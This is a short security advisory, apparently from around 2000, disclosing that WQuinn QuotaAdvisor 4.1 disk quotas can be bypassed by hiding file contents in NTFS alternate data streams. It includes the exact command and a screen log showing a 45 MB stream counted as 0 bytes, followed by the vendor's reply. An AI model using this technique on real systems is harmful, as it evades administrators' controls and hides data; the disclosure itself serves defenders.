Vulnerability

    QuotaAdvisor

Affected

    QuotaAdvisor 4.1 (Build 450) by WQuinn

Description

    Following  is  based  on  a  Delphis  Consulting Security Advisory
    DST2K0037.   It  is  possible  to  bypass  the  quotas  imposed by
    QuotaAdvisor by utilising data streams alternative to the default.
    Example:

        cat e:\45mbfile.doc > 0mbfile.doc:hidden

    This would  enable a  45mb file  to appear  as if  the user is not
    utilising their quota.  CAT was taken from the NT Resource KIT.

    Explorer & WQuinns space monitor shows the file as 0bytes although
    the total amount of free disk space availible does decrease.

    Example screen log:

        I:\quota>copy C:\45mbfile.doc .\
        There is not enough space on the disk.
                0 file(s) copied.
        
        I:\quota>cat C:\45mbfile.doc > .\0mbfile.doc:hidden
        
        I:\quota>.\streams .\
        
        .\0mbfile.doc
          45698829  :hidden:$DATA
        
        I:\quota>dir hello.exe
         Volume in drive I has no label.
         Volume Serial Number is C0FA-B4DF
        
         Directory of I:\quota
        
        09/25/2000  05:49p                    0 0mbfile.doc
                       1 File(s)              0 bytes
                       0 Dir(s)   1,841,468,928 bytes free

Solution

    Currently  there  us  no  known  solution  to  this  problem.  The
    following are the vendors comments in response to our advisory:

        "This is  a known  issue based  on a  design choice  to ignore
        streams.  We plan in the future to support them."